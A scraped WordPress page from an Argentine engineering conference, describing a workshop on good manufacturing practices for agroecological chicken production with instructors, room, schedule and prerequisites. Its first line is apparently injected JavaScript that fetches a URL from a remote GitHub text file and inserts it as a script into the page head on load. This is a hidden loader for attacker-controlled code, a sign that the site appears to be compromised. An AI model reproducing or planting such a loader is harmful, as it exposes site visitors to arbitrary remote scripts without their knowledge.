;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Taller de Buenas Prácticas de manufactura en producción de pollo agroecológicos para agricultura familiar – XV Jornadas de Ciencia y Tecnología de Facultades de Ingeniería del NOA
Menú Cerrar

Taller de Buenas Prácticas de manufactura en producción de pollo agroecológicos para agricultura familiar

  • Docentes:
  • Dra. Ing. Lara Valeria Lescano Farias
  • Dra. Ing. Miriam Teresa Nediani
  • Esp. Ing. María Mercedes Paz
  • Aula: VIP
  • Capacidad: 25
  • Día y Horario: Jueves  9-13
  • Requisitos: Nivel superior de las carreras de ingeniería en alimentos,  ingeniería química, ingeniería industrial, licenciatura en alimentos.

Información detallada

clic aqui para ver como llegar
WordPress Appliance - Powered by TurnKey Linux